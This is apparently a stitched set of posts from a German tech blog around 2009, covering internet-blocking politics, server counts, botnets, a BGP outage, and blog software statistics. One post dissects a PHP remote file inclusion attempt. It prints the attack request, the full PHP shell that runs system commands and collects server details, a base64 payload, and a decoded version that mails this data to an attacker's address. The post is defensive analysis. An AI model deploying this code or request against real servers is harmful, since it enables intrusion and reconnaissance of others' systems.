Löschkandidaten/12. November 2009

Chaos_Computer_Club

Wer Wikipedia kritisiert hat keine Erwähnung verdient. — WB 19:28, 11. Nov. 2009 (CET)

Wem da wohl zuviel Weissbier in den Kopf gefahren ist?

Quelle

Wir haben alles im Interesse der Internetnutzer getan und alle wesentlichen Bedenken des Bundesrates und der Internet-Community aufgegriffen.

Für solche Aussagen habe ich nur noch Verachtung übrig. Enttäuschung weniger, dafür hat sich das die letzten Monaten viel zu sehr angedeutet. Das was Herr Dörmann von sich gibt kann bestenfalls als Lüge Wahrnehmungsstörung bezeichnet werden.

Und die Presse? Sie spricht die Einigung innerhalb der Großen Koalition an und verweist auf die empörten Reaktionen und spricht von Frust innerhalb der Netzgemeinde. Das mag im ersten Moment vielleicht stimmen, aber insgeheim regiert doch die geballte Faust in der Hosentasche. Hier wurde eben nicht die Gruppe der Politikverdrossenen geprellt, sondern die, welche noch aktiv eingreifen wollen. Aber damit ist nun Schluss, CDU und SPD haben sich selbst abgewandt von uns und gezeigt wie egal ihnen die Meinung von Zehntausenden sind. Leider wird dies in den Medien nicht so hervorgehoben – ach was heisst leider – wie erwartet wird es nicht von den Redaktionen der Print- und Funkmedien thematisiert.

Nachdem nun also der erste erwartete Schreck vorbei ist, freue ich mich sogar ein wenig. Durch den gestrigen Tag wird sich nun ein weiterer Teil der Bevölkerung von den etablierten Parteien abwenden und mit freudiger Erwartung sehne ich den Wahlabend daher, nur um im Anschluss die lustigen Erklärungsversuche für die geringe Wahlbeteiligung bzw. das Wahlergebnis zu hören und zu lesen.

Ach ja, CDU und SPD haben nebenbei auch die Novelle des Bundesdatenschutzgesetzes so weichgeklopft das der Handel und Weiterverkauf von Adressen weiter ohne Probleme möglich ist. Ein dreifaches Hoch auf den Wirtschaftslobbyismus und seine Schattenvertreter im Bundestag.

Related posts:

• Netzsperre für Frankreichs Internetbeauftragte
• Australiens ‘Great Firewall’ Pläne vorerst gescheitert?
• BKA-Gesetz droht im Bundesrat zu scheitern
• Googles Doubleclick verbreitet (wieder) Malware
• Schäuble und das Sicherheitsnetzwerk

(Bildquelle: Spreeblick)

Related posts:

• Die einzig richtige Antwort

Server Top-Liste der Unternehmen

• 1&1 Internet: 55.000 Server (Unternehmensdaten)
• Rackspace: 50.038 Server (Unternehmensdaten)
• The Planet: 48.500 Server (Unternehmensdaten)
• Akamai Technologies: 48.000 Server (Unternehmensdaten)
• OVH: 40.000 to 55.000 Server (Unternehmensdaten)
• SBC Communications: 29.193 Server (Netcraft)
• Verizon: 25.788 Server (Netcraft)
• Time Warner Cable: 24.817 Server (Netcraft)
• SoftLayer: 21.000 server (Unternehmensdaten)
• AT&T: 20.268 Server (Netcraft)
• Peer1/ServerBeach: 10.277 Server (Unternehmensdaten)
• iWeb: 10.000 Server (Unternehmensdaten)

Unternehmen ohne öffentliche Statistiken

Wie schon geschrieben veröffentlichen nicht alle Unternehmen solche Statistiken und so kann man oftmals nur vermuten wieviel Server sie haben. Teilweise wird dabei aus alten Daten extrapoliert.

Wer hat also noch mehr als 50.000 Server?

Google
Es wird angenommen das Google mindestens 450.000 Server besitzt. Diese Daten sind allerings schon 3 Jahre alt, so dass die aktuelle Zahl weitaus höher sein kann. Zum Vergleich – Google veröffentlichte erst kürzlich Daten zu einen Rechenzentrum mit mehr als 45.000 Servern.

Microsoft
Aus Screenshots aus einer Management Software für Rechenzentren von Microsoft kann man auf eine Zahl von mindestens 218.000 Server schließen. Allerdings sind auch diese Daten leicht veraltet und von Mitte 2008. Das neue Rechenzentrum von Microsoft in Chicago wird bis zu 300.000 Server beinhalten und sobald dieses in Betrieb genommen wird, wird sich die Gesamtzahl massiv erhöhen.

Amazon
Es gibt kaum Zahlen zur Serveranzahl von Amazon. allerdings lässt die Tatsache, dass das Unternehmen den weltgrößten Onlineshops sowie eines der größten Cloud-Computing Netzwerke betreibt auf eine sehr größe Serverzahl schließen. Im Jahr 2008 kaufte Amazon Server im wert von 86 Millionen Dollar.

eBay
Mit 160 Millionen Nutzern des Aktionshauses und Paypal sowie 443 Millionen Skype Nutzern braucht es eine große Serverzahl. Allein die riesige Menge an Daten, welche bei rund 8.5 Petabytes liegt, läßt vermuten das auch eBay mehr als 50.000 Server besitzt.

Yahoo
Das nach Google und Microsoft drittgrößte Suchportal ist ehr wahrscheinlich im Club der über 50.000 Server Unternehmen.

GoDaddy
Der weltgrößte Domainregistrar mit 35 Millionen Domains unter ihrer Verwaltung und einer der größten Shared Hosting Unternehmen ist möglicherweise in den gleichen Größenordnungen wie 1&1 Internet zu finden.

IBM
Mit mehr als 743.000 Quadratmeter Platz in Rechenzentren kann IBM auf eine riesige Anzahl an Server zurückgreifen. Genaue Zahlen sind allerdings nicht bekannt.

Facebook
Facebook hat mehr als 10.000 Server, allerdings sind diese Zahlen von April 2008 und sollten seit dem stark gestiegen sein.

Related posts:

• Internet Statistik 2008
• DDos Angriffe auf bekannte russische Gay Webseiten
• Twitters eigener Slashdot-Effekt crasht Webseiten
• Dubai, Hauptstadt der Botnetze in Nahost
• DDoS lähmt Kirgistan – Teil 2

Auch wenn die meisten Angriffe gegen die EMEA Region, das heißt Europa, Nahost und Afrika, von den Vereinigten Staaten ausgehen, macht Dubai trotzdem noch einen großen Anteil aus. Im Jahr 2008 stiegen die Vereinigten arabischen Emirate von Platz 43 (2007) auf Platz 10 in den Angriffsstatistiken. Grund dafür ist möglicherweise der starke Anstieg der Breitbandanschlüsse in der Region mit einer Zunahmen von fast 900% seit dem Jahr 2005.

Im Bericht von Symantec wird auch deutlich das von der gesamten EMEA Region Saudi Arabien am schwersten von Infektionen mit Computerwürmern betroffen war. Zuvor war das Land noch auf Platz 13. Auch hier ist in jüngster Zeit ein massiver Ausbau der Breitbandversorgung vorangetrieben worden. Damit steigt der Nahe Osten von der einstmaligen Opferrolle malwaregesteuerte Angriffe in die Riege der Angreifer auf.

Related posts:

• Spam-Level steigt wieder
• In Texas warnen Verkehrsanzeigetafeln vor Zombies
• Tiefseekabeldefekt – Update
• Die 10 nennenswertesten Internetstörungen 2008
• 4 Gründe warum es immer schwerer wird Botnetze zu bekämpfen

Heute hatte ich mir mal den Spaß gemacht einen solchen “Angriff” genauer anzuschauen. Dabei geht es im vorliegenden Fall im einen sehr einfachen Versuch, so daß jetzt hier keine wirklichen Überraschungen zum Vorschein kommen. Solche Versuche gibt es weltweit sicherlich im sechsstelligen Bereich pro Tag.

Der HTTP-Request

Eine typische Anfrage in dieser Hinsicht ist zum Beispiel die folgende:

207.182.137.218 – - [03/May/2009:22:57:48 +0200] “GET /?_SERVER[DOCUMENT_ROOT]=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1″ 200 43066 “-” “libwww-perl/5.820″

Was sehen wir hier? Von der IP 207.182.137.218 wird versucht durch eine GET-Anfrage und Umschreiben der DOCUMENT_ROOT Variable die Datei idnew.txt zu lesen und unter den Rechten des Webservers auszuführen. Anhand der Angabe libwww-perl sieht man, dass die Anfrage durch eine Perl Bibliothek erfolgt und nicht durch einen Browser, also scheint hier ein Script zu werkeln.

Die idnew.txt und ihr Inhalt

Der Inhalt der idnew.txt besteht aus PHP-Code, der teils mit MIME base64 kodiert ist. Hier der PHP-Code aus der Datei:

<?php
//Coracore Response
$pwd1 =    @getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 = ex(”id”);if (empty($id1)) {$id1 = @get_current_user();}
$sof1 =    @getenv(”SERVER_SOFTWARE”);
$php1 =    @phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1=    @diskfreespace($pwd1);
$all1= disk_total_space($pwd1);
$used =    ConvertBytes($all1-$free1);
$free =    ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
$all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
if (@is_writable($pwd1)) {$perm = “[W]“;} else {$perm = “[R]“;}
if (@ini_get(”safe_mode”) or strtolower(@ini_get(”safe_mode”)) == “on”) {$sf = “ON”;} else {$sf = “OFF”;}

echo “Coracore”.$sf.”<br>”;
echo “uname -a:    $un<br>”;
echo “os: $os<br>”;
echo “id: $id1<br>”;
echo “pwd: $pwd1<br>”;
echo “php: $php1<br>”;
echo “software:    $sof1<br>”;
echo “srvip: $ip1<br>”;
echo “srvname: $name1<br>”;
echo “free: $free<br>”;
echo “used: $used<br>”;
echo “total: $all $perm<br>”;

function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) { return sprintf(”%d b”, $number); }
if($len >= 4 && $len <=6) { return sprintf(”%0.2f Kb”, $number/1024); }
if($len >= 7 && $len <=9) { return sprintf(”%0.2f Mb”, $number/1024/1024); }
return sprintf(”%0.2f Gb”, $number/1024/1024/1024);
}

function ex($cfe) {
$res = ”;
if (!empty($cfe)) {
if(function_exists(’exec’)) {
@exec($cfe,$res);
$res = join(”\n”,$res);
} elseif(function_exists(’shell_exec’)) {
$res = @shell_exec($cfe);
} elseif(function_exists(’system’)) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists(’passthru’)) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,”r”))) {
$res = “”;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
} else { $res = “NULL”; }
}
return $res;
}

?>

<?php
$lmge = “JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NM
nhzUUdkdFlXbHNMbU52YlE9PSIpOw0KKCRzYWZlX21vZG
UpPygkc2FmZXo9Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKT
sNCiRiYXNlPSJodHRwOi8vIi4kX1NFUlZFUlsnSFRUUF9IT1
NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107IA0KJG5h
bWUgPSBwaHBfdW5hbWUoKTsgJGlwID0gZ2V0ZW52KCJS
RU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0aG9zdGJ5YWRkcig
kX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3ViaiA9ICRfU0V
SVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIlxuQkFTR
TogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6ICRieX
Bhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7DQok
ZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRvb
2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbC
ggJGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZnJvbSk7″; eval(base64_decode($lmge));
exit;
?>

Wie man sieht versucht das Script zuerst einige Daten über das System zu sammeln. Dazu gehören Betriebssytem, Benutzer-ID, Speicherplatz, IP des Servers, PHP-Version, Server-Software und ob man Systemzugriff hat.

Kodierter Code und der Urheber

Interessant ist aber vor allem der letzte Teil des Scripts. Zu sehen ist eine Zeichenfolge die mit MIME base64 kodiert ist und ausgeführt wird. Dekodiert man diesen String erhält man folgenden Klartext-Code:

$creator=base64_decode(”ZnIzM3NoM2xsQGdtYWlsLmNvbQ==”);
($safe_mode)?($safez=”ON”):($safez=”OFF_HEHE”);
$base=”http://”.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname(); $ip = getenv(”REMOTE_ADDR”); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST'];
$msg = “\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds”;
$from =”From: “.$writ.”___=”.$safez.”<tool@”.$_SERVER['HTTP_HOST'].”>”;
mail( $creator, $subj, $msg, $from);

Hier sieht man das eine Email mit IP, Hostname usw. an eine Email geschickt werden soll. Hierdurch erhält der Angreifer bei erfolgreichen Scriptausführung eine Benachrichtigungsemail mit Daten zum Server und der URL die für diesen Exploit anfällig ist. Die Empfänger-Email ist noch einmal mit base64 kodiert:

$creator=base64_decode(”ZnIzM3NoM2xsQGdtYWlsLmNvbQ==”);

Nach Dekodierung ist diese nun lesbar und führt zu dem Gmail-Account: fr33sh3ll@gmail.com
Ich habe Google hierzu einfahc mal informiert und warte mal ob eine Antwort kommt oder ob dieser Account nicht schon längst abgestellt wurde.

Related posts:

• Datenschutzerklärung
• 90% aller Emails weltweit sind Spam
• DDoS lähmt Kirgistan – Teil 2
• Google Analytics adé
• Norwegens Regierung setzt sich für Open-Office ein

Was war geschehen?

Am Sonntag, den 3.Mai, konnte ein plötzlicher und andauernder Anstieg von Routingupdates und ihnen folgenden Internetausfällen beobachtet werden. Normalerweise kann man daraufhin feststellen das die Ausfälle von Land X ausgehen und durch Aktivitäten des Provider Y verursacht werden. Dieses Mal aber waren die Ausfälle überall zu beobachten. Es wurden Probleme und Instabilitäten in Indonesien, Bulgarien, Deutschland, Rumänien, Brasilien, Russland, USA und vielen anderen Ländern gemeldet. Aufgrund dieser globalen Verteilung sah es wieder nach einem ähnlichen Vorfall wie im Februar aus. Und dies war dann auch der Fall.

Technische Vorbetrachtung

Um das Problem vom 3. Mai zu verstehen bedarf es zuerst einiger Vorüberlegungen. Jede Organisation die für Internetrouting mitverantwortlich ist, kontrolliert zwei Dinge. Zum einen Blöcke von IP Adressen (Prefixe) und eine Identifikationsnummer, Autonome System Number (ASN) genannt. Wie auch bei IPv4 ist die Zahl der ASNs begrenzt und die Zahl noch verfügbarer ASNs wird langsam aber stetig knapp. Designtechnisch sind 2 Bytes für eine ASN vorgesehen, was einer Anzahl von 65.536 entspricht. Aktuell ist man nun bei ASN 49.232 angekommen. ASNs ab 64.512 sind reserviert, so dass noch circa 15.000 2-Byte ASNs verfügbar sind. Durch diese Limitierung wird es nicht mehr allzu lange dauern bis auch diese letzten ASNs belegt sind. Aufgrund dessen hat man eine Alternative vorgesehen, nämlich 4-Byte ASNs. Seit 2009 werden diese von RIPE standardmäßig vergeben. Praktischerweise können diese 4-Byte ASNs problemlos neben den 2-Byte ASN koexistieren.

Zurück zum 3. Mai

Wie geschrieben, sollten 4-Byte ASNs somit problemlos funktionieren und könnten somit auch völlig normal über Router verbreitet werden. Und so dachte sich die Afrikanische Netzwerk Operatoren Gruppe (AfNOG) nichts dabei bei ihrem kommenden Treffen in Kairo, Agypten solche 4-Byte ASNs für das Netzwerk zu nutzen. Sie besorgten sich die 4-Byte ASN 327686 und teilten mit:

Eines der Ziele dieses Setups ist zu demonstrieren das 32-Bit ASN funktionieren und die Leute sich davor nicht scheuen brauchen, zumal die Zahl der 16-Bit ASNs schnell schrumpft. Ein Vorzeigenetzwerk soll dies zeigen.

Die AfNOG hat einen IPv4 Prefix, namentlich 196.200.208.0/20 und eine der “alten” 2-Byte ASN – 37095. Am 30. April gegen 17:21 UTC konnte nun beobachtet werden das diese 2-Byte ASN obigen Prefix verbreitete:

* 24863 37095 37095 37095 37095 37095 37095 37095 37095 37095 37095 37095

ASN 24863 gehört zu LINKdotNET, einen lokalen ägyptischen Provider. Bis davin zeigte der ASN Pfad also nichts ungewöhnliches. Dann aber am 3. Mai um 12:00 UTC wurde obiger Pfad durch 4-Byte ASNs ersetzt:

* 24863 327686 327686 327686 327686 327686 327686 327686 327686 327686 327686 37095

Sofort wurden daraufhin global Probleme gemeldet und Ausfälle weltweit waren zu verzeichnen.

Internetausfälle 3. Mai © Renesys

Warum kam es zu Ausfällen?

Weltweit werden verschiedenste Router eingesetzt. Von teuren Cisco oder Juniper Routern bis hin zu günstigen linuxgesteuerten Rechern mit der freien Routing-Software Quagga. Und da liegt das Problem. Ältere Versionen von Quagga haben ein Buffer Overflow Bug, der die BGP Session verwarf, sobald die Routing-Ankündigung mit dem 4-Byte Pfad ankam. Die Software von Quagga belegt nur eine begrenzte Anzahl von Zeichen für ASNs und sobald jemand mehrere 4-Byte ASN aneinanderhängt, wie im vorliegenden Fall, ist der Puffer erreicht und läuft über. Die aktuellste Quagga Version 0.99.11 vom Oktober 2008 behandelt das Problem besser behandelt und störungsfrei.

Nachfolgende Grafik zeigt die Verteilung der Länder in denen mindestens 10 Netzwerke aufgrund dieses Bugs betroffen waren.

Länderverteilung der Ausfälle © Renesys

Links

AfNOG Takes Byte Out of Internet (renesys)
AfNOG (Webseite)

Related posts:

• Router in Tschechien sorgt weltweit für Internetausfälle
• Anzahl der SSL-Zertifikate weltweit übersteigt 1 Million
• DDoS Angriffe auf mehrere Webhoster und DNS Provider
• Einblicke in die Arbeitsumgebung eines Google Rechenzentrums
• China’s Qzone größer als Facebook?

Wir fordern, daß der Deutsche Bundestag die Änderung des Telemediengesetzes nach dem Gesetzentwurf des Bundeskabinetts vom 22.4.09 ablehnt. Wir halten das geplante Vorgehen, Internetseiten vom BKA indizieren & von den Providern sperren zu lassen, für undurchsichtig & unkontrollierbar, da die “Sperrlisten” weder einsehbar sind noch genau festgelegt ist, nach welchen Kriterien Webseiten auf die Liste gesetzt werden. Wir sehen darin eine Gefährdung des Grundrechtes auf Informationsfreiheit.

Seit  die Petition gestern richtig bekannt wurde, reisst der Strom der Unterzeichner nicht ab und inzwischen gibt es rund 17.000 Mitzeichner. Damit die Petition im Kabinettsausschuss zum tragen kommt und der Inititator Rederecht erhält, bedarf es insgesamt 50.000 Stimmen.

Related posts:

• CDU: Wer Internetsperren verhindert, unterstützt Kinderpornographie
• DDoS Angriff gegen Weltverband der Musikindustrie
• AK Vorrat startet Kampagne gegen verdachtlose Aufzeichnung von Surfdaten
• Linkverbot gegen Heise bestätigt
• Französisches Three-Strikes Gesetz vom Tisch?

Hintergrund

Gültiges (X)HTML und CSS sind kein reiner Selbstzweck. Damit eine Webseite in den meisten heutzutage benutzten Webbrowsern gleich aussieht, muss man oft ein wenig in die Trickkiste greifen. Um dies zu erreichen ist es oft einfacher, wenn man bei der Programmierung der Webseite beziehungsweise der Templates gültiges (X)HTML verwendet, weil damit in den meisten Bereichen sichergestellt ist, das alle Browser die Webseite halbwegs ähnlich rendern. Das dies nicht immer möglich ist und nicht alle vom W3C festgelegten Standards gleichermaßen unterstützt werden ist zwar klar, aber sollte einen nicht unbedingt abhalten ein wenig auf die Sauberkeit des Quellcodes zu achten. Zwar liegt das Problem oftmals im fremden Code, wie Bannerwerbung, CMS-Plugins oder diverse Javascript-Spielereien, sollte einen aber nicht abhalten ein wenig drauf zu achten.

Testergebnisse (X)HTML

Aus den oben angesprochenen Gründen habe ich nicht erwartet das alle Blogs gültiges XHTML liefern und zumindestens zu einem hohe Prozentsatz mit einigen Fehlern pro Blog gerechnet. Das allerdings so gut wie kein Blog gültiges XHTML besitzt hat mich dann aber doch ein wenig überrascht. Nur 6 Blogs sind unter den Top100 die auf fehlerfreien XHTML beruhen. Von 7 Blogs konnte ich keinen Test machen, da der Validator Probleme mit der Zeichenkodierung hatte. Die restlichen 87 Blogs haben allerdings teils weniger gut abgeschnitten. Um den Grad zu beurteilen haben ich eine Einteilung in mehrere Gruppen vorgenommen, je nach Anzahl der festgestellten Fehler:

Sehr gut: 6 Blogs (0 Fehler)
Gut: 10 Blogs (1-10 Fehler)
Befriedigend: 14 Blogs (11-25 Fehler)
Ausreichend: 9 Blogs (26-45 Fehler)
Mangelhaft: 10 Blogs (46-75 Fehler)
Ungenügend: 44 Blogs (ab 76 Fehler)

Gültiges (X)HTML der Top100 Blogs

Erschreckend war dabei das es noch 36 Blogs gibt, welche mehr als 150! Fehler aufweisen und somit alles andere als standardkonform sind. Ob das im Endeffekt Auswirkungen auf die Darstellung hat sei dahingestellt und muß nicht zwangsläufig der Fall, zumal sich oftmals Folgefehler ergeben die bei Behebung eines einzelnen Fehlers gleich mit aufheben. Aber in diesen Fällen sollten die Blogbetreiber doch einmal nachprüfen ob sich da nicht mit wenigen Kniffen etwas machen läßt.

Testergebnisse CSS2

Geprüft wurde auf gültiges CSS in der Version 2, dem defacto Standard. Hier sah es schon deutlich besser aus und Fehler sollten auch ungleich einfacher zu beheben sein, ohne negative Auswirkungen auf das Layout oder Design zu haben. 15 Blogs nutzen hierbei gültiges CSS2, 79 Blogs ungültiges CSS2 und bei 6 Blogs konnte eine Überprüfung aufgrund unterschiedlichster Probleme kein Ergebnis erbringen. Auch hier nahm ich die gleiche Unterteilung in Gruppen wie schon zuvor beim XHTML Test vor. Das Ergbnis ist hier dabei wie folgt:

Sehr gut: 15 Blogs (0 Fehler)
Gut: 52 Blogs (1-10 Fehler)
Befriedigend: 15 Blogs (11-25 Fehler)
Ausreichend: 8 Blogs (26-45 Fehler)
Mangelhaft: 3 Blogs (46-75 Fehler)
Ungenügend: 1 Blog (ab 76 Fehler)

Gültiges CSS2 der Top100 Blogs

Hier könnten die Blogbetreiber relativ schnell nachbessern und die Fehlerquote runterschrauben. Die Auswirkungen von fehlerhaften CSS sind natürlich geringer und oftmals vernachlässigbar, aber sollten trotz allem nicht außer Acht gelassen werden.

Verwendete Doctypes

Auf Anregung habe ich nachträglich noch fix die verwendeten Doctypes untersucht und möchte die Ergebnisse nicht vorenthalten. Ein Großteil nutzt XHTML in Version 1.0. Davon setzt die Mehrheit auf Transitional statt auf Strict. Nur noch sehr selten wird noch die alte HTML 4.0 Version eingesetzt. Vereinzelt finden sich auch schon Blogs in der neueren XHTML 1.1 Version.

XHTML 1.0 Transitional: 75 Blogs
XHTML 1.0 Strict: 17 Blogs
XHTML 1.1: 4 Blogs
HTML 4.0: 2 BLogs

Fazit

Gültiges XHTML und CSS nach dem W3C-Standard wird in der Blogosphäre scheinbar noch sehr stiefmütterlich behandelt. Die Auswirkungen können dabei auch sehr unterschiedlich sein und von negativen Konsequenzen wie größeren Problemen in der Darstellung mit Browser X, bis hin zu keinen spürbaren Unterschieden. Wie wichtig einem standardkonformes XHTML und CSS ist, können nur die Blogbetreiber selbst entscheiden. Persönlich würde ich schon drauf achten, allein um es den Besuchern zu erleichtern das Blog in den unterschiedlichsten Browservarianten zu betrachten, obgleich auch gültiges XHTML/CSS absolut kein Allheilmittel ist.

Technisches zur Versionsbestimmung
Um die Blogs auf gültiges XHTML zu überprüfen habe ich die jeweiligen URLs mit ein PHP Batch Script beim Dienst validator.w3c.org (XHTML) und jigsaw.w3.org (CSS) abgefragt. Für die CSS Prüfung wurde dabei ausschließlich auf CSS2 geprüft, da dies eigentlich Standard sein sollte. Teilweise konnten die URLs nicht ausgewertet werden, da der entsprechende Dienst Probleme mit der Adresse hatte. In diesen Fällen wurde noch einmal manuell versucht die Adresse zu prüfen. Die Untersuchung fand am 21. April statt und griff auf die Daten von deutscheblogcharts.de Ausgabe 13/2009 vom 01.04.2009 zurück.

Related posts:

• 71% der deutschen Top100 Blogs nutzen Wordpress
• Blogsoftware Statistik der Technorati Top100 Blogs
• 35% der deutschen Top100 Blogs nutzen altes Google Analytics Script
• Verfassungsschutz greift nach dem BKA-Gesetz
• EU sucht Käufer für Nacktscanner

Hier nun 4 Gründe warum es schwerer wird gegen Botnetze vorzugehen:

1. Stilles Operieren ohne Aufmerksamkeit zu wecken

Anders als im aktuellen Fall von Conficker (Conficker-Arbeitsgruppe: ca. 4.6 Millionen Zombies) und der damit einhergehenden medialen Berichterstattung operieren viele der größten Botnetze außerhalb des Medienzirkuses. Genau dies ist der Idealfall für die Botnetzbetreiber.

Je weniger über ein Botnetz berichtet wird, umso höher ist die Wahrscheinlichkeit das es unentdeckt für die meisten Computernutzer bleibt. Durch die Conficker-Berichterstattung in den Mainstreammedien hat wahrscheinlich auch der Letzte davon erfahren und zumindestens einmal in seinem Leben das Wort Botnetz beziehungsweise Conficker gehört und kann damit etwas anfangen. Aber fragt man diese zum Beispiel nach Cimbot, wird man mit Sicherheit nur ein Achselzucken zurückbekommen. Cimbot ist eine Malware die benutzt wird um ein weltweites Botnetz zu kreieren das laut aktuellen Studien für 15% des weltweiten Spamvolumens verantwortlich ist.

Sicherheitsexperten haben noch viele andere solcher unscheinbaren Botnetzen auf dem Radar und sehen die Problematik oftmals in den Verschleierungstechniken dieser Software. Viele Botnetze und die damit einhergehenden Trojaner verwenden Techniken wie serverseitigen Polymorphismus durch das sich die Malware ständig selbst leicht ändert um Antivirensoftware zu täuschen und im Kampf um die Erkennungsroutinen die Nase immer ein kleines Stück vorne zu haben. Bekanntes Beispiel dafür ist das Waledac Botnetz.

Gleichzeitig haben die Botnetzbetreiber angefangen ihre Command-and-Control-Server von einer zentralisierten Verwaltung auf eine Peer-To-Peer Architektur umzubauen. Damit ist es noch schwerer geworden den Steuerungskopf solcher Botnetze einfach abzuschalten. Conficker, Storm oder Waledac profitieren genau von solchen Methoden.

2. Malware schützt sich selbst

Die Schreiber von Trojanern und Botznetz verwandter Malware setzen verstärkt auf Kryptographie um es den Sicherheitsfirmen schwerer zu machen. Dabei bedient man sich stärker Verschlüsselungstechniken um zum Beispiel die Command-and-Control-Server zu schützen und zu verschleiern. Früher konnte man diesen Servern noch falsche Anweisungen schicken und sie damit effektiv stören und abstellen. Heute beruhen die Kommandos die hin- und hergeschickt werden auf kryptographischen Befehlen die solch ein Vorgehen deutlich erschweren.

Durch den bereits im ersten Punkt angesprochen Polymorphismus verändern sich Botnetzwürmer von Kopie zu Kopie und machen es Antivirenherstellern ungleich schwerer geeignete Signaturen für die Erkennung zu generieren.

3. Viele Anwendungen liegen außerhalb der IT-Kontrolle

Egal wie stark zum Beispiel Firmennetzwerke abgesichert sind, gibt es immer wieder neue Einfallstore durch die Viren, Trojaner oder Würmer auf Computer eindringen und die entsprechenden Computer in ein Botnetz einreihen. Oftmals sind es Computeranwendungen von Drittanbietern die Sicherheitslücken aufweisen und die außerhalb der Kontrolle der zuständigen Administratoren liegen.

In einer aktuellen Studie von 60 großen Unternehmen mit insgesamt fast 900.000 untersuchten Mitarbeitern sich gezeigt das dort eingesetze Software viele Sicherheitsmaßnahmen umgehen und die Abwehrstruktur der Unternehmensnetze hinfällig werden lassen. Viele Software springt von Port zu Port oder nutzt viele oft standardmäßig freigegeben Ports wie 80 oder 443. Darunter sind so prominente Anwendungen wie Microsoft Sharepoint oder Update-Dienste wie Apple- und Adobe Updateprogramme. Ebenfalls nutzen viele Mitarbeiter Fernwartungssoftware um auf entfernente Rechner zugreifen zu können. Und immer wieder finden sich P2P-Software auf Firmenrechner und machen es bei bekanntwerdenen Sicherheitslücken einfach über diese Viren und ähnliches einzuschleusen.

Die meisten Firmen setzen daher Firewalllösungen ein, aber die Komplexität läßt Lücken entstehen die sofort ausgenutzt werden.

4. Soziale Netzwerke haben die Angriffsoberfläche vergrößert

Durch die wachsende Zahl an Menschen die Soziale Netzwerke wie Facebook, Twitter oder Myspace nutzen entstehen neue Angriffsvektoren die von Botnetzbetreibern ausgenutzt werden. Da auf solchen Plattformen ein reger Austausch von hochgeladenen Dateien (Fotos, Texte, Musikdateien ect.) stattfindet, landen Viren leicht in Firmennetzwerken und überwinden durch aktives Zutun der Mitarbeiter viele interne Sicherheitsmaßnahmen.

Um dies anzugehen müssen die Mitarbeiter und allgemein Computernutzer für die Problematik sensibilisiert werden. Das geschieht bereits in kleinerem Umfang erreicht aber die große Masse eher selten. Erst durch extreme Fälle wie im Fall von Conficker wird ein breites Publikum durch die Mainstreammedien angesprochen. Um zukünftige Epidemien zu verhindern bedarf es zu einem guten Teil den Nutzer selbst, da Antivirenhersteller und IT-Sicherheitsexperten nur bedingt Einfluß nehmen können.

Related posts:

• Dubai, Hauptstadt der Botnetze in Nahost
• Ausnutzung von Sicherheitslücken immer schneller
• Forscher erstellt Dateien mit “Fake” Microsoft Authenticode™
• Rumanien setzt Vorratsdatenspeicherung bis Ende 2009 aus
• Spam-Botnets – Ausblick 2009

Ergebnis der Untersuchung

Mit überraschend deutlichen Abstand wird von den deutschen Top100 Blogs die Software Wordpress eingesetzt. Von den untersuchten Seiten nutzen sage und schreibe 71 Wordpress und verdeutlichen damit die Monopolstellung dieser Software. Weit abgeschlagen liegt auf Platz 2 Serendipity mit 5 Blogs und auf Platz 3 Antville, die in diesem Fällen von den Blogplattformen blogger.de und twoday.de eingesetzt wird. Fast kaum wird hierzulande dagegen Typepad, Drupal oder Lifetype eingesetzt. Am Ende der Reihe finden sich dann noch einige Exoten wie ExpressionEngine, Frontier Kernel Project, eZ publish, Community Server oder Blogs die auf der Plattform blogger.com gehostet werden. Von insgesamt 7 Blogs konnte eine kurze Überpüfung der Seite nicht aufzeigen welche Software eingesetzt wird. Mindestens 1 Blog nutzt eine Eigenkreation.

Blogsoftware der Top100 Blogs

Wordpress im Detail

Da der deutlich größte Anteil auf Wordpress fällt, lohnte sich hier eine Überprüfung der einzeln eingesetzten Versionen. Da die neue Wordpress-Version 2.8 in Kürze freigegeben wird, vielleicht für den ein oder anderen Blog Zeit über die eigene Update-Politik nachzudenken.

Vorneweg gesagt, die Mehrheit setzt die aktuellste Version 2.7.1 ein, dicht gefolgt von einen noch relativ hohen Anteil an Version 2.7, was aber kein größes Problem darstellt, da seitdem keine kritischen Sicherheitslücken bekannt sind. Interessant fand ich aber das doch verhältnismäßig viele Blogs auf teils doch sehr veraltete Versionen setzen. Erklären kann ich mir das eigentlich nur bedingt. Vielleicht ist das Layout beziehungsweise die Templates nicht mit neueren Versionen kompatibel oder aber die Webseite wird extern gewartet, das allerdings schlecht. Aber vielleicht ist das den entsprechenden Betreibern auch alles egal. Jedenfalls finden sich unter den Top100 noch so Relikte wie 2.0.x, 2.3.x und viele 2.6.x Versionen. Die sich angesprochenen Blogs könnten ja mal drüber nachdenken auf die bald erscheinende 2.8er zu wechseln. Allein aus Sicherheitsaspekten keine schlechte Wahl.

Wordpressversionen der Top100 Blogs

Fazit

